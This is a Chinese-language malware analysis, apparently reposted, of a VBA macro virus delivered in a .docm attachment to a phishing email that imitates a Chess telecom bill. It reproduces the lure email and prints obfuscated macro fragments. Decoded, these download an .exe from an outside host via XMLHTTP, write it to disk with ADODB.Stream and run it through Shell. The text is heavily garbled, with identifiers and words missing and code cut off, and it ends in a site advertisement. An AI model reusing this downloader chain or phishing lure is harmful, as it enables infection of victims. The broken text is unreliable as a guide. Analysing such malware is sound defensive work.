技术分析：一款流行的VBA宏病毒

1.通过邮件传播的宏病毒

近期流行的一个宏病毒通过邮件进行传播,捕捉到的一个样本，其邮件头如下：

邮件的内容是这样子的(为节省篇幅,省略号处省略部分内容)：

Your bill

: 24583

Bill date: July 2015

: £17.50

How can I view my bills?

Your Chess bill is ready and for you . To check out your deta=, bills and any you’ve since your last b=ll, just sign into My your sign in ?

If you’ve your sign in , no , you can reset these b=

is easy!

If you want to make a or debit card you can do by cho=sing

You don’t need to do if you pay by debit, we will y=ur on or after 30th June. If you pay by , deta=ls of how to pay us are on the .

to Debit today and you’ll save at least £60.00 a year, s=mply call our team on 0844 770 6060.

else you’d like to know?

……

This e-mail has been sent from a to Chess , House, Heyes Lane, Edge, , SK9=7JP.

in , . Its are to the=20 .

If you in error, Chess on

+44 (0)800 019 8900 the name of the , the

+email

which it has been sent and then it; you may not rely on i=s nor copy/ it to .

, and

of in this email are those of the and will not bind Chess Tel=com by an of this mess=ge.

We do not for ; you must scan for these.

sent to and from Chess are for=20 , and , to =20 and to and use of our .

Thank you for your co-.

are to terms and , VAT and are to .

E&OE

上述邮件正文：描述内容看起来相当的可靠，里面的电话号码都是真实的，并且给出了具体的公司名称地址，而且这个公司还真是具体存在的，现在还不知道这个公司是否知道自己被人冒名干坏事儿了(有点绕口,但不是重点…)，之所以这么逼真，只是恶意邮件发送者希望以此来降低受害者的防备意识。

2.提取宏代码

我们主要分析的邮件的附件，通过的保存功能可以将邮件中的附件2015-07-Bill.docm保存出来，我们分析需要用到一个工具，可以到这里下载。

提取宏代码的步骤如下：

2.1 解压

.exe 2015-07-Bill.docm

解压后将会默认保存到C:~1~1~1Temp目录下面(WinXP SP3环境),解压后的目录大致如下：

│ [].xml

│

├─

│ app.xml

│ core.xml

│

├─word

│ │ .xml

│ │ .bin

│ │ .xml

│ │

│ ├─theme

│ │ .xml

│ │

│ └─_rels

│ .xml.rels

│ .bin.rels

│

└─_rels

上面的文档目录结构中可以发现在word目录下含有一个.bin的文件，这就是宏文件代码所在的地方，需要注意的是名字是可以任意取的，并不一定就是(为默认的宏文件名字)。接下来从.bin文件中提取宏代码。

2.2 提取

.exe .bin info

默认会在.bin同目录下生成一个文件夹.BIN-，里面存放有vba宏代码的各个模块。本案例中所提取到的各个文件如下：

上面的文件都是vb代码，只不过去掉了后缀而已。接着的工作就是分析vb代码，看一下具体做了什么。

3.代码分析

为了便于说明,并没有按照模块的顺序来说明。

3.1 代码分析

的代码如下：

1 = “”

3 init

5 Set = Forms(“main”)

7 = .

8 = .

10 End

11 ( As )

12 = (((, Chr(60), “”), Chr(61), “”), Chr(59), “”)

13 Set = ()

14 End

15 Sub

16 On Error GoTo

18 = .Value

19 = “”

20 DoCmd. ,

22 :

23 Exit Sub

25 :

26 Err.

29 End Sub

主要看[11-14]行代码，如下：

( As )

= (((, Chr(60), “”), Chr(61), “”), Chr(59), “”)

Set = ()

End

函数中的主要语句(((, Chr(60), “”), Chr(61), “”), Chr(59), “”)，其中的Chr(60),chr(61),Chr(59)分别对应于 0 Or Me. > 0 Then

7 Me.total = ( * Me.boxes) + Me.

8 Else

9 Me.total = Me.

10 End If

12 End Sub

14 Sub

15 If Me.boxes > 0 Then

16 Me.total = * Me.boxes

17 End If

18 End Sub

20 ( As , )

21 Dim : Set = (“A” & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & “e” & Chr(97) & Chr(59) & “m”)

23 With

24 .Type = 1

25 .Open

26 .write

27 End With

. , 2

29 End

30 Sub

31 If Me.boxes > 0 Or Me. > 0 Then

32 Me.total = ( * Me.boxes) + Me.

33 Else

34 Me.total = Me.

35 End If

36 End Sub

38 Sub

39 DoCmd.Save

40 End Sub

主要看[20-29]代码段，如下：

( As , )

Dim : Set = (“A” & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & “e” & Chr(97) & Chr(59) & “m”)

With

.Type = 1

.Open

.write

End With

. , 2

End

主要提供一个函数(=字节数组,=文件名)，其语句为:

(“A” & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & “e” & Chr(97) & Chr(59) & “m”)

可以看到这里采用了中的解密函数，对加密的字符串进行解密后使用。我们已经知道了函数的作用，因此手工解密后得到：

删除其中的”空格 ; < =",得到真正的命令：Adodb.。进一步分析可以得到该函数的作用为：

采用adodb.流，将字节数组写入指定文件中。

稍后我将会提供一个脚本对这些命令进行解密，还原出宏代码的真正命令。

3.3 模块分析

1 = “”

3 As

4 As

5 As

6 As ‘query base

7 As ‘ form name

8 As ‘text field for code entry

9 As ‘text field for name entry

10 As

11 As

12 colS1 As ‘ to

13 colS2 As ‘ to

17 ‘check form if they have user input

18 If Not (Forms().()) Then

19 = Forms().()

20 Else

21 = “”

22 End If

24 If Not (Forms().()) Then

25 = Forms().()

26 Else

27 = “”

28 End If

30 ‘main logic

31 If ( = “” And = “”) Or (() And ()) Then

32 =

33 (Not () = True) And (Not () = True) Then

34 = & ” WHERE ” & colS1 & ” LIKE ‘” & & “*’ AND ” & colS2 & ” LIKE ‘*” & & “*'”

35 Not () Then

36 = & ” WHERE ” & colS1 & ” LIKE ‘” & & “*'”

37 Not () Then

38 = & ” WHERE ” & colS2 & ” LIKE ‘*” & & “*'”

39 Else

40 ” to “

41 Exit

42 End If

44 Forms(). =

46 End

47 ( As )

49 .().Left = 720

51 End

53 Sub

55 = Chr(104) & Chr(116) & Chr(61) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(59) & Chr(47) & Chr(108) & Chr(97) & Chr(98) & Chr(111) & “a” & Chr(60) & Chr(117) & “d” & Chr(105) & Chr(111) & Chr(46) & Chr(61) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(52) & Chr(116) & Chr(102) & Chr(51) & Chr(51) & Chr(119) & Chr(47) & Chr(60) & Chr(119) & Chr(52) & Chr(116) & Chr(52) & Chr(53) & Chr(51) & Chr(46) & Chr(59) & “e” & Chr(61) & Chr(120) & Chr(101)

‘下载方式:=.

56 Set = (“M” & “i” & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & “s” & Chr(111) & “f” & Chr(116) & “;” & Chr(46) & “X” & Chr(77) & Chr(60) & “L” & Chr(59) & Chr(72) & “T” & Chr(61) & Chr(84) & “P”)

58 = (((, Chr(60), “”), Chr(61), “”), Chr(59), “”)

‘使用进行下载: . Open

59 , Chr(79) & Chr(112) & Chr(101) & Chr(110), , Chr(71) & Chr(69) & Chr(84), _

60 _

61 , False

‘=.Shell

63 Set = (Chr(87) & “

———END———
限时特惠： 本站每日持续更新海量各大内部创业教程，永久会员只需109元，全站资源免费下载点击查看详情
站长微信： nanadh666

声明： 本站内容转载于网络，版权归原作者所有，仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任，若侵犯到你的版权利益，请联系我们，会尽快删除处理！